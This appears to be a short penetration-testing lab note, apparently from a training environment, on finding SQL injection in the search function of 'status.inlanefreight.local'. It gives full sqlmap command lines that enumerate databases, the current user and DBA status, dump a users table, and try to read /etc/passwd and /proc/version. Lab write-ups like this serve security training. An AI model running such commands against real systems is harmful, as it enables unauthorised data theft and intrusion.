## `status.inlanefreight.local`
- nothing here ![[images/Pasted image 20260628153106.png]]
- hit search ![[images/Pasted image 20260628211142.png]]
- `request:response` in burp ![[images/Pasted image 20260628211158.png]]
- run `sqlmap` as this looks like a likely sqli ![[images/Pasted image 20260628211426.png]]
- enum dbs and current user
```bash
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --current-db --is-dba --banner --batch
```
![[images/Pasted image 20260629203050.png]]
- `status` is a non-default db; let's enum its tables ![[images/Pasted image 20260629203205.png]]
- `users` table ![[images/Pasted image 20260629203637.png]]
- nothing in `company` table
- unable to read `files`
```bash
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd
sqlmap --batch -r status.inlanefreight.req --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/proc/version
```
![[images/Pasted image 20260629204112.png]]